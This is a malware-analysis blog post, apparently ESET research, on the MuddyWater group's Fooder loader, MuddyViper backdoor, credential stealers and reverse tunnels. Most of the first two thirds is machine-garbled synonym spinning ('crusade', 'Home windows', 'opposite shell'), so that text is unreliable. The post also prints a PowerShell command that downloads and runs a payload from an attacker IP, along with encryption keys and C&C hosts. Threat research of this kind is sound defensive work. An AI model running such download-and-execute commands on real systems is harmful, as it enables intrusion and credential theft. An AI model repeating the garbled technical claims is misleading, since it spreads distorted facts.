ESET researchers have recognized new MuddyWater job basically concentrated on organizations in Israel, with one showed goal in Egypt. MuddyWater, additionally known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage crew identified for its continual concentrated on of presidency and important infrastructure sectors, steadily leveraging tradition malware and publicly to be had equipment. On this crusade, the attackers deployed a suite of in the past undocumented, tradition equipment with the target of bettering protection evasion and endurance. Amongst those equipment is a tradition Fooder loader designed to execute MuddyViper, a C/C++ backdoor. A number of variations of Fooder masquerade because the vintage Snake recreation, and its interior common sense features a tradition lengthen serve as impressed by means of the sport’s mechanics, mixed with widespread use of Sleep API calls. Those options are meant to lengthen execution and obstruct automatic research. MuddyViper allows the attackers to gather device knowledge, execute information and shell instructions, switch information, and exfiltrate Home windows login credentials and browser information. The crusade additionally leverages credential stealers (CE‑Notes and LP‑Notes) and opposite tunneling equipment (cross‑socks5), lengthy a favourite of MuddyWater operators.
Despite the fact that that is our first public blogpost overlaying MuddyWater, ESET researchers had been monitoring the gang for a number of years and feature documented its actions in a couple of ESET APT Process Reviews. In contrast to earlier campaigns of MuddyWater, that have been steadily noisy and simply detected, the only lined on this blogpost demonstrates a extra centered, subtle, and delicate way.
Key issues of this blogpost:
- MuddyWater builders followed CNG, the next-generation Home windows cryptographic API, which is exclusive for Iran-aligned teams and rather ordinary around the broader risk panorama.
- The crowd extensively utilized extra complicated ways to deploy MuddyViper, a brand new backdoor, by means of the usage of a loader (Fooder) that reflectively a lot it into reminiscence and executes it.
- We offer technical analyses of the equipment used on this crusade, together with MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and cross‑socks5 opposite tunnels.
- All the way through this crusade, the operators intentionally have shyed away from hands-on-keyboard interactive periods, which is a traditionally noisy method steadily characterised by means of mistyped instructions.
MuddyWater crew evaluation
MuddyWater is a cyberespionage crew energetic since no less than 2017, basically concentrated on entities within the Heart East and North The united states. It is among the maximum energetic Iran-aligned APT teams tracked by means of ESET researchers and has hyperlinks to the Ministry of Intelligence and Nationwide Safety of Iran.
The crowd used to be first presented to the general public as MuddyWater by means of Unit 42 in 2017, whose description of the gang’s job is in keeping with ESET’s profiling – a focal point on cyberespionage, the usage of malicious paperwork as attachments designed to suggested customers to allow macros and bypass safety controls, and a number one concentrated on of entities situated within the Heart East.
Notable previous actions come with Operation Quicksand (2020), a cyberespionage crusade concentrated on Israeli executive entities and telecommunications organizations, which exemplifies the gang’s evolution from elementary phishing techniques to extra complicated, multistage operations; and a crusade concentrated on political teams and organizations in Türkiye, demonstrating the gang’s geopolitical focal point, its skill to evolve social engineering techniques to native contexts, and reliance on modular malware and versatile C&C infrastructure.
But even so its widespread job, MuddyWater operations are steadily noisy. The crowd is understood for its continual concentrated on of presidency, army, telecommunications, and important infrastructure sectors, usually the usage of tradition malware and publicly to be had equipment to achieve get admission to, care for endurance, and exfiltrate delicate information. Along with concentrated on its archenemy, Israel, the gang seems to be concentrated on nations that care for, or search to reinforce, diplomatic ties with Iran.
ESET has documented a couple of campaigns attributed to MuddyWater that spotlight the gang’s evolving toolset and moving operational focal point. Whilst the sooner operations depended on large concentrated on and rather unsophisticated ways, newer campaigns reveal indicators of technical refinement and higher precision.
In March and April 2023, MuddyWater focused an unidentified sufferer in Saudi Arabia by means of deploying a batch script that downloaded a PowerShell-based backdoor, which used to be used to obtain and execute arbitrary payloads and therefore to take away the preliminary payload from disk.
The crowd carried out a crusade in January and February 2025 that used to be notable for its operational overlap with Lyceum (an OilRig subgroup), additional detailed on this e-newsletter. This newest overlap suggests an evolution in MuddyWater’s modus operandi.
The crowd’s publicly documented tradition equipment come with, for instance, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, in addition to custom-compiled variants of open-source equipment corresponding to LaZagne or CrackMapExec. MuddyWater campaigns usually don’t leverage or introduce new equipment, malware, or ways; as an alternative, they’re steadily noteworthy because of the concentrated on.
Whilst MuddyWater first of all concentrated strictly on cyberespionage, its cooperation with Lyceum resulted in concentrated on of the producing sector thru spearphishing. The assault generated substantial noise and accomplished little relating to operational goals.
The crusade defined on this e-newsletter displays what, for MuddyWater, appears to be an unparalleled development in toolset and technical execution.
Victimology
As in the past discussed, throughout this crusade, MuddyWater basically focused organizations in Israel, but additionally one in Egypt. Desk 1 lists the sufferers by means of nation and vertical. The crusade started on September 30th, 2024 and concluded on March 18th, 2025.
Desk 1. Sufferers by means of nation and vertical
| Nation | Vertical |
| Egypt | Era |
| Israel | Engineering #1 |
| Engineering #2 | |
| Engineering #3 | |
| Native Executive #1 | |
| Native Executive #2 | |
| Production | |
| Era | |
| Transportation | |
| Utilities | |
| College #1 | |
| College #2 | |
| College #3 | |
| Unidentified #1 | |
| Unidentified #2 | |
| Unidentified #3 | |
| Unidentified #4 | |
| Unidentified #5 |
One fascinating factor to notice concerning the sufferer within the utilities vertical is they had been additionally compromised by means of Lyceum on February 11th, 2025.
Overlap and cooperation with Lyceum
In early 2025, ESET Analysis recognized an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage crew, often referred to as HEXANE or Typhoon-0133. OilRig has been energetic since no less than 2014 and is frequently believed to be founded in Iran. Gear that we characteristic to Lyceum come with DanBot, Shark, Milan, Marlin, Sun, Mango, OilForceGTX, and various downloaders that leverage legit cloud services and products for C&C conversation. We’ve in the past seen Lyceum concentrated on a couple of Israeli organizations, together with nationwide and native governmental entities, in addition to organizations within the healthcare sector.
All the way through the crusade lined right here, MuddyWater carried out a joint sub-campaign with OilRig in January and February 2025, MuddyWater initiated get admission to thru a spearphishing e mail containing a hyperlink to an installer for the Syncro far flung tracking and control (RMM) device. Following the preliminary compromise, the attackers put in an extra RMM device, PDQ, and deployed a tradition Mimikatz loader disguised as certificates information with .txt dossier extensions. In keeping with the seen job, harvested credentials had been almost definitely utilized by Lyceum to achieve get admission to and think regulate of operations inside the focused manufacturing-sector group in Israel.
This cooperation means that MuddyWater could also be appearing as an preliminary get admission to dealer for different Iran-aligned teams.
Attribution
The victimology, TTPs, and tooling seen on this crusade align with a number of of the newly documented features and equipment that we have got in the past attributed to MuddyWater. This overview is in keeping with the preliminary get admission to manner and the following supply of malicious equipment – usually by the use of spearphishing emails that comprise hyperlinks to obtain RMM device.
TTPs
MuddyWater operators proceed to depend on predictable and script-based backdoors written in PowerShell and Cross. Their concentrated on stays centered at the telecommunications, governmental, and oil and effort sectors.
Preliminary get admission to is usually accomplished thru spearphishing emails, steadily containing PDF attachments that hyperlink to installers for RMM device hosted on loose file-sharing platforms corresponding to OneHub, Egnyte, or Mega. Those hyperlinks result in the obtain of RMM equipment together with Atera, Stage, PDQ, and SimpleHelp.
A few of the equipment deployed by means of MuddyWater operators may be the VAX‑One backdoor, named after the legit device which it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater provider.
The crowd’s persevered reliance in this acquainted playbook makes its job rather simple to stumble on and block.
Gear overlap
Moreover, we recognized code overlaps between a number of of the newly documented equipment and the ones we in the past attributed to MuddyWater:
- LP-Notes, a brand new credential stealer, has the similar design as CE-Notes, a browser-data stealer, that we in the past related to MuddyWater. All the way through this crusade, we additionally seen a Mimikatz loader, which stocks the similar design and obfuscation strategies as CE-Notes.
- We seen a number of new variants of MuddyWater’s custom designed cross‑socks5 opposite tunnels, which the gang used all over 2024 and 2025.
- In two cases, we seen the custom designed cross‑socks5 opposite tunnels embedded in a brand new MuddyWater loader, internally named Fooder. In a dozen different instances, this loader used to be used to load MuddyWater’s new backdoor, MuddyViper.
- Apparently, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for information encryption and decryption. To the most productive of our wisdom, that is distinctive to Iran-aligned teams. Any other trait those equipment proportion is they try to thieve person credentials by means of opening a pretend Home windows Safety conversation.
Toolset
On this blogpost, we report in the past unknown, tradition equipment utilized by MuddyWater:
- Fooder loader – a newly recognized loader that a lot the MuddyViper backdoor into reminiscence and executes it. Notice that a number of variations of Fooder masquerade because the vintage Snake recreation, therefore the designation, MuddyViper. Any other notable function of Fooder is its widespread use of a tradition lengthen serve as that implements the core common sense of the Snake recreation, mixed with Sleep API calls. Those options are meant to lengthen execution in an try to disguise malicious conduct from automatic research programs.
- MuddyViper backdoor – a in the past undocumented C/C++ backdoor that allows attackers to gather device knowledge, obtain and add information, execute information and shell instructions, and thieve Home windows credentials and browser information.
The remainder of the toolset documented on this blogpost contains:
- CE-Notes, a browser-data stealer,
- LP-Notes, a credential stealer,
- Blub, a browser-data stealer, and
- a number of cross‑socks5 opposite tunnels.
Fooder loader
Fooder is a 64-bit C/C++ loader designed to decrypt after which reflectively load the embedded payload (as illustrated in Determine 1), with MuddyViper being probably the most often seen payload.
Fooder appears to be the inner identify of this device, in keeping with its PDB paths:
- C:UserswinDesktopFooderDebugLauncher.pdb
- C:UserspcDesktopmainMy_ProjectFooderx64DebugLauncher.pdb
Despite the fact that we now have best captured one pattern of it, we imagine that Fooder is finished by means of a easy launcher utility, written in C. It has no string obfuscation and verbose logging to the console, and the PDB trail left intact:
C:UserspcsourcereposConsoleApplication7x64ReleaseConsoleApplication7.pdb
We’ve seen one example (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the element launching Fooder. Deployed underneath the identify %USERPROFILEpercentDownloadsOsUpdater.exe, the launcher expects a procedure ID as a command line argument. As soon as finished, it makes an attempt to copy the token of the desired procedure by the use of the DuplicateTokenEx API, after which makes use of CreateProcessAsUserA to execute Fooder.
As soon as finished, Fooder decrypts the embedded payload following those steps:
- The command line argument (6) is added to every byte of a hardcoded key, which produces the AES decryption key, shared throughout all samples, 6969697820511281801712341067111416133321394945138510872296106446.
- A hardcoded worth (5) is subtracted from every byte of the hardcoded payload.
- In any case, the hardcoded payload is decrypted the usage of the WinCrypt API and the AES key.
Fooder then a lot the payload at once into reminiscence the usage of reflective ways, permitting it to execute with out depending on same old device calls or writing to disk.
As soon as introduced thus, Fooder has been used to ship no longer best MuddyViper but additionally HackBrowserData, an open-source software in a position to decrypting and exporting delicate browser knowledge corresponding to credentials and cookies. Fooder additionally facilitates the deployment of cross‑socks5 variants, which can be Cross-compiled binaries that serve as as opposite tunnels, enabling attackers to circumvent firewalls and Community Cope with Translation (NAT) mechanisms. Significantly, the MuddyWater crew has in the past applied cross‑socks5 independently of Fooder, indicating a persevered reliance in this device for stealthy community conversation and information exfiltration.
Notice that a number of variations of Fooder masquerade because the Snake recreation – see the strings and mutexes highlighted in Determine 2 – its maximum often embedded payload.
Any other notable function of Fooder is its widespread use of a tradition lengthen serve as (which implements the core common sense of the Snake recreation, the place the participant maneuvers the tip of a rising line, steadily themed as a snake, to keep away from hindrances and acquire pieces) and the Sleep API calls. The lengthen in execution is accomplished by means of mimicking the loop-based lengthen serve as: as within the Snake recreation, the place every motion is managed by means of a loop that waits for a brief duration prior to updating the sport. The loop introduces execution delays that decelerate the malware’s conduct, serving to it to evade equipment that track for speedy malicious job. Determine 3 highlights the delays and the Snake recreation welcome banner offered to the person at runtime.
Fooder does no longer have any integrated endurance capacity. On the other hand, in instances when Fooder’s ultimate payload is the MuddyViper backdoor, the backdoor can arrange endurance for the loader by the use of a scheduled process or the Startup folder.
MuddyViper backdoor
MuddyViper, a in the past undocumented backdoor written in C and C++, allows gaining covert get admission to and regulate over compromised programs. We’ve seen MuddyViper best in reminiscence, loaded by means of Fooder, which could be the explanation there is not any obfuscation or string encryption. As is standard for MuddyWater, MuddyViper sends extraordinarily verbose and widespread standing messages to its C&C server all over its execution, corresponding to the next:
- [+] Persist: ——————– Hello,I’m Are living ——————–
- [+] Persist: ——————– Hello,First Time ——————–
- [-] Persist: failed Create process !!!!
The backdoor additionally assists in keeping a long checklist of 150+ procedure names and information about the respective merchandise as a way to ship detailed reviews concerning the safety equipment detected within the compromised atmosphere, despite the fact that including the main points may have been simply carried out at the server aspect:
- [>] Procedure: aciseagent.exe ~~> (Cisco Umbrella Roaming Safety) –> (Safety DNS) discovered!
- [>] Procedure: acnamagent.exe ~~> (Absolute Patience) –> (Asset Control) discovered!
- [>] Procedure: acnamlogonagent.exe ~~> (Absolute Patience) –> (Asset Control) discovered!
This conduct ends up in really extensive community visitors.
MuddyViper has two strategies of setting up endurance:
- A scheduled process named ManageOnDriveUpdater can release MuddyViper from the trail on every device get started.
MuddyViper helps 20 backdoor instructions – see Desk 2 for main points of them all – significantly together with the facility to open and perform opposite shells, obtain, add, and execute information, file the operating safety equipment, thieve person credentials and information from various browsers, arrange its personal endurance, and uninstalling itself.
Desk 2. MuddyViper backdoor instructions
| ID | Arguments | Motion | Reaction |
| 200 | N/A | N/A | 0, by the use of the GET /adad or GET /aq36 request, to acquire a backdoor command. |
| 207 | N/A | Decrypts the embedded HackBrowserData device and reflectively a lot it in a brand new thread. This open-source device can thieve credentials, historical past, and different knowledge from internet browsers. MuddyViper then compresses the accumulated information (right into a dossier named CacheDump.zip) and uploads it to the C&C server. |
Gathered browser information, by the use of the GET /mq65 request. In case of an error, a tradition standing message is shipped as an alternative. |
| 300 | Launches a opposite shell the usage of:
• the equipped command line (command ID 300) • C:windowssystem32cmd.exe (command ID 301) • C:windowssystem32WindowsPo Then, in a loop, uploads the method output to the C&C server and translates the server reaction (see command IDs 350-352) till interrupted. |
Procedure output, by the use of the GET /oi32 request. In case of an error, a tradition standing message is shipped as an alternative. |
|
| 301 | N/A | ||
| 302 | N/A | ||
| 350 | N/A | Will have to observe command IDs 300-302. Sleeps for a preconfigured period of time – for the opposite shell loop, the default is one 2nd. | |
| 351 | Sleep time (in milliseconds) | Will have to observe command IDs 300-302. Configures the sleep time for the opposite shell loop – the default is one 2nd. | |
| 352 | Enter for the opposite shell. | Will have to observe command IDs 300-302. Passes the equipped argument to the operating opposite shell. | |
| 360 | N/A | No longer carried out, most likely associated with the opposite shell API. | A tradition error message: [-] Agent does no longer have an energetic pipe |
| 400 | Flag. | Will have to observe command ID 401. It confirms that the C&C server has effectively gained part of the exfiltrated native dossier. Optionally adjusts the sleep prior to a better add laid out in command ID 401 to ten seconds. | No reaction, until this command is issued out of doors of a pending dossier add procedure, it sends a tradition error message: [-] Agent does no longer have an DOWNLOAD dossier |
| 401 | Sleep time (in milliseconds), filename. | Initiates a dossier add operation from the desired native dossier to the C&C server in chunks, with the desired sleep time between every add. | Contents of the desired dossier, by the use of a sequence of GET /dadw requests. |
| 500 | Information chew. | Will have to observe command ID 501. Writes the gained information chew right into a in the past created and opened native dossier. | A tradition error message, if the operation fails. |
| 501 | Sleep time (in milliseconds), filename. | Downloads a dossier from the C&C server in chunks into a neighborhood dossier with the desired identify. The desired sleep time is used as a lengthen after downloading every information chew. Deletes the dossier if the relationship can’t be established after six consecutive makes an attempt. | A chain of GET /dadwqa requests, to request the dossier contents. |
| 700 | Sleep time (in milliseconds) | Configures the sleep time between connection makes an attempt to the desired worth (default is 60 seconds). | N/A |
| 800 | N/A | Enumerates operating processes, in search of decided on safety equipment from an intensive hardcoded checklist. | For every detected procedure, sends a file with the next knowledge, populated from that hardcoded desk: [>] Procedure: |
| 805 | Timeout (in milliseconds) | Shows a pretend Home windows Safety conversation (see Determine 4), prompting the person to fill in credentials, which can be then exfiltrated to the C&C server. Makes use of the equipped argument as a timeout for the conversation. | Gathered credentials, by the use of the GET /rq13 request: [+] creds ~~> Username: If no longer a success, a tradition error message is shipped as an alternative. |
| 806 | N/A | Units up endurance by the use of a scheduled process named ManageOnDriveUpdater. The backdoor copies itself to its set up trail, until it’s already operating from there. | A tradition standing message, relying at the consequence of the operation. |
| 900 | N/A | Uninstalls itself. First, clears endurance set by the use of a Home windows Startup Folder after which deletes itself. Notice that this motion is not going to transparent the endurance by the use of a scheduled process that may be set by means of the backdoor command ID 806. |
A tradition standing message, relying at the consequence of the operation. |
| 905 | N/A | Terminates the present backdoor procedure. | N/A |
| 906 | N/A | Relaunches itself (by the use of the CreateProcessW API) and terminates the present procedure. | A tradition standing message, relying at the consequence of the operation. |
| different | N/A | N/A | [-] Agent statusCode I do not have it |
One of the vital instructions indexed in Desk 2, with ID 805, presentations a pretend Home windows Safety conversation in an try to lure the sufferer into filling of their Home windows credentials, as observed in Determine 4. A equivalent method is utilized by MuddyWater’s LP-Notes stealer (see LP-Notes credential stealer).
Any other command, with ID 900, goals to take away MuddyViper from the compromised gadget and transparent its endurance; then again, the command does no longer take away all lines of the backdoor.
Community protocol
To keep up a correspondence with its C&C server, MuddyViper makes use of HTTP GET requests (by the use of the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag configured to make use of SSL/TLS. Two C&C servers had been seen: processplanet[.]org and 35.175.224[.]64.
Each instructions of conversation AES-CBC encrypt the information, the usage of the CNG API with the important thing (used throughout samples) 0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.
Within the backdoor → server path of the communications:
- Each and every endpoint URI supported by means of the C&C server can be utilized by means of the backdoor for a selected form of request, corresponding to soliciting for a command, importing a dossier, or sending a tradition standing message.
- Further information for the C&C server is integrated within the HTTP request frame, which is unconventional for HTTP GET requests.
- The Consumer-Agent string is A WinHTTP Instance Program/1.0, a remnant of the instance code for the WinHttpOpen API.
- The relationship, ship, obtain, and reaction timeouts are set to 30 seconds.
- Default sleep time between consecutive connection makes an attempt is 60 seconds. This worth may also be configured by means of command ID 700.
- Upon failure, connection makes an attempt are retried as much as 10 instances.
- Previous to encryption, the information is all the time formatted as
/ .*
Within the server → backdoor path of the communications:
- The HTTP standing code determines the backdoor command ID.
- The backdoor command arguments are integrated within the HTTP reaction frame.
CE-Notes browser-data stealer
CE-Notes is a browser-data stealer that we named after the filename – ce-notes.txt – used to degree stolen information on disk. We found out CE-Notes in 2024 once we seen MuddyWater deploying EXE and DLL variations of it at the device of a company in Israel.
CE-Notes used to be downloaded with the next PowerShell command:
“C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe” (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content material | Invoke-Expression
Each variations of the browser-data stealer try to thieve and decrypt the app-bound encryption key saved within the Native State dossier (%APPDATApercentLocalGoogleChromeUser DataLocal State) of Chromium browsers (Chrome, Courageous, and Edge). App-bound encryption used to be presented in Chrome model 127, enabling Chrome to encrypt information tied to app identification. Cybercriminals and APT teams have stuck on and are actively seeking to paintings round app-bound encryption to thieve consultation keys. CE-Notes is relatively very similar to ChromElevator on GitHub.
The accumulated information is AES-CBC encrypted the usage of the CNG API with the important thing 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.
Then the encrypted information is saved on disk in C:UsersPublicDownloadsce-notes.txt for later retrieval (almost definitely by the use of an RMM device, since neither the EXE nor the DLL variations have any method of exfiltrating the dossier). The main distinction between the EXE and the DLL is the digital gadget evasion capability added to the DLL.
We seen the CE-Notes browser-data stealer within the following places:
- C:system2.dll
- C:UsersPublicDownloadssystem2.dll
- C:Intelsystem.dll
- C:20240926_165509.exe
LP-Notes credential stealer
LP-Notes is a C/C++ Home windows credential stealer with the similar design because the CE-Notes browser-data stealer. Following the similar naming conference as in relation to CE-Notes, we named the stealer LP-Notes in keeping with the native dossier it makes use of to degree stolen credentials prior to exfiltration: C:UsersPublicDownloadslp-notes.txt (vs. C:UsersPublicDownloadsce-notes.txt). The only real function of LP-Notes is to lure sufferers into filing their credentials by means of showing a pretend Home windows Safety conversation, prompting them to go into their Home windows username and password. We’ve seen an example of LP-Notes being downloaded and finished by means of PowerShell with an overly equivalent command line to that proven within the CE-Notes phase.
Initialization
On execution, LP-Notes begins by means of in search of a procedure named taskhostw.exe (Host Procedure for Home windows Duties) after which impersonating the safety context of the method (by the use of the ImpersonateLoggedOnUser API); best then does LP-Notes turn on its malicious payload.
LP-Notes employs a number of easy obfuscation ways, together with a tradition, addition-based regimen for string decryption. Determine 5 displays the serve as that decrypts strings of lengths starting from 15 to 19 characters, regardless that the decryption secret is all the time the similar – a suite of predefined constants which are added or subtracted from every byte of the string. Apparently, CE-Notes makes use of the similar decryption regimen, apart from for a distinct decryption key, as proven in Determine 6.
LP-Notes makes use of string stacking for strings shorter than 15 or longer than 19 characters, together with the decryption key, IV, and import names. In any case, to difficult to understand the usage of Home windows API purposes and to make static research tougher, LP-Notes dynamically resolves the API purposes throughout the C runtime startup, prior to the execution of the WinMain serve as, the usual access level for a graphical Home windows-based utility in keeping with Microsoft, thus hiding direct references to the API purposes from pseudocode view (see Determine 7).
Features
In an never-ending loop, LP-Notes presentations a pretend Home windows Safety conversation prompting the sufferer to go into their Home windows username and password, as proven in Determine 8 (by the use of the CredUIPromptForWindowsCredentialsW API). Notice that even though equivalent, this isn’t the similar because the faux credential suggested utilized by MuddyViper (see Determine 4). It instantly confirms the validity of any submitted credentials by means of making an attempt to go browsing as that person (by the use of the CredUnPackAuthenticationBufferW and LogonUserW APIs).
If a success, the harvested credentials are then AES-CBC encrypted the usage of the CNG API with the important thing ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.
Very similar to CE-Notes, LP-Notes then shops the encrypted credentials in a neighborhood dossier – on this case C:UsersPublicDownloadslp-notes.txt. As neither of those elements have the potential to exfiltrate information, every other element possibly handles this (both an RMM device or MuddyViper).
Blub browser-data stealer
Blub is a C/C++ browser-data stealer incorporating a statically related SQLite library. The identify is derived from its filename, Blub.exe. We seen the PDB trail C:Usersjojosourcereposstealerx64Releasestealer.pdb. It steals person login information from Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera internet browsers.
Chromium-based browsers
For Chrome, Blub first terminates chrome.exe (if operating) after which parses and decrypts the encryption key from C:Customers
SELECT origin_url, username_value, password_value FROM logins
A equivalent collection of steps is used to acquire and decrypt person credentials from Microsoft Edge and Opera person profiles, the usage of the important thing bought from C:Customers
Firefox
In any case, to decrypt saved person credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json dossier in every person’s profile listing, i.e., %APPDATAROAMINGpercentMozillaFirefoxProfiles
The accumulated information is saved into a neighborhood dossier named dossier.txt, and not using a encryption. The similar information is logged onto the console, and not using a encryption, in conjunction with verbose standing messages. Blub has no capacity to exfiltrate this dossier.
Notice that Blub exams for operating processes related to safety answers prior to executing its malicious payload, that specialize in the combo of afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected operating (however no longer AvastSvc.exe), Blub concludes that Norton is operating (which now makes use of the Avast engine) at the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, apart from it skips stealing credentials from Microsoft Edge.
Whilst Blub’s strings are saved in cleartext, a easy obfuscation method is used for strings related to the Google Chrome information stealer capability. Particularly, a couple of strings are concatenated into one lengthy string, with 16 random characters between them, it appears to cover them from view throughout static research:
gdGlog}o{eRwjpw&”encrypted_key”:FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW’xxqjpwe}uDuplicateTokenExs5&}vlion2(sh|y⌂ryme~ds~
Removing the junk characters and splitting the strings returns:
- “encrypted_key”:
- ImpersonateLogge
- OpenProcessToken
- DuplicateTokenEx
go‑socks5 reverse tunnels
MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.
Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.
path ESETGO
mod ESETGO (devel)
dep github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep github.com/hashicorp/yamux v0.1.1 h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep golang.org/x/net v0.29.0 h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep golang.org/x/sys v0.25.0 h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants
The primary purpose of MuddyWater’s go‑socks5 proxy is to relay communication between the compromised machine (on a specific port) and a hardcoded C&C server, using a hardcoded connection key to authenticate with the C&C server via SSL/TLS. This setup allows the attacker to route C&C traffic (potentially related to other compromises) through the compromised machine and thus to hide the location of the real C&C server.
Conclusion
This campaign indicates an evolution in the operational maturity of MuddyWater. The deployment of previously undocumented components – such as the Fooder loader and MuddyViper backdoor – signals an effort to enhance stealth, persistence, and credential harvesting capabilities. The use of game-inspired evasion techniques, reverse tunneling, and a diversified toolset reflects a more refined approach than in earlier campaigns, even though traces of the group’s operational immaturity remain.
MuddyWater continues to demonstrate the ability to execute campaigns ranging from average to above average, i.e., being timely, effective, and increasingly challenging to defend against. While we assess that MuddyWater will remain a leading actor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.
ESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic targeting of government, military, telecommunications, and critical infrastructure.
For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.
IoCs
Files
| SHA-1 | Filename | Detection | Description |
| 76632910CF67697BF5D7 |
OsUpdater |
Win64/MuddyWater.E | MuddyWater – Fooder launcher. |
| 1723D5EA7185D2E339FA |
Blub |
Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer. |
| 69B097D8A3205605506E |
Blub |
Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer. |
| B7A8F09CB5FF8A336539 |
Blub |
Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer. |
| B8997526E4781A6A1479 |
stealer |
Win64/MuddyWater.H | MuddyWater – Blub browser-data stealer. |
| 8E21DE54638A79D8489C |
7d1e9726b5YZPYc |
Win32/MuddyWater.B | MuddyWater – CE-Notes browser-data stealer. |
| CD47420F5CE408D95C98 |
fe197add74IVcQn |
Win64/MuddyWater.I | MuddyWater – CE-Notes browser-data stealer. |
| C1299E8C9A8567A9C292 |
vmsvc |
Win64/MuddyWater.I | MuddyWater – CE-Notes browser-data stealer. |
| 29CDA06701F9A9C0A679 |
3a70e4c8c2IVcQn |
Win64/MuddyWater.C | MuddyWater – LP-Notes credential stealer. |
| 8F3ED626E7B929450E36 |
3a70e4c8c2IVcQn |
Win64/MuddyWater.C | MuddyWater – LP-Notes credential stealer. |
| 007B5CD6D6ACF972F774 |
Dsync-es |
Win64/MuddyWater.F | MuddyWater – Mimikatz loader. |
| CD36F93DBC4C71893059 |
App_chek |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded HackBrowserData tool. |
| 47B70C47BEB33E88B419 |
steam |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel. |
| D46900D78AE036967E0B |
antimage |
Win32/MuddyWater.A | MuddyWater – Fooder loader with embedded go‑socks5 reverse tunnel. |
| 0657D0B0610618886DDD |
wtsapi32.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 2939FD218E0145D730BD |
msi.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 3BC6502A55A4D5D29132 |
WinWin |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 7950296331802188EB99 |
20241118_223247 |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 8580824FE14DB1583881 |
Launcher.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| B48B93B4EB69D01588D3 |
Launcher |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| EA8A1C2382FF765709D7 |
vcruntime140_1 |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| EAF4BAFC62170C9FCA1F |
Launcher |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| F5EFBA6CCBA5A6AD6C3A |
ncrypt.dll | Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 13DA612D75DC5268F523 |
WinWin(persist) |
Win64/MuddyWater.G | MuddyWater – Fooder loader with embedded MuddyViper backdoor. |
| 25361183DE63F296BA71 |
0bff183a39ruQsY |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 0E9A4892CFA1C9065B36 |
20d188afdcpfLFq |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 2B09241CA025BDC4455E |
dttcodexgigas |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 2E9BE23CDD8152DB6CD1 |
7295be2b1fHxjyf |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 45FA7DE711FEA1F8D1E3 |
fa54125dc8ZpaNJ |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 4E0EF2386980639FC535 |
20d188afdcWgOQB |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 4E9529BA4A6E42D6278D |
bd34a33f5bHOVby |
WinGo/TrojanProxy |
MuddyWater – go‑socks5 reverse tunnel. |
| 50C6D4A2AD16A231CF11 |
re |
WinGo/TrojanProxy |
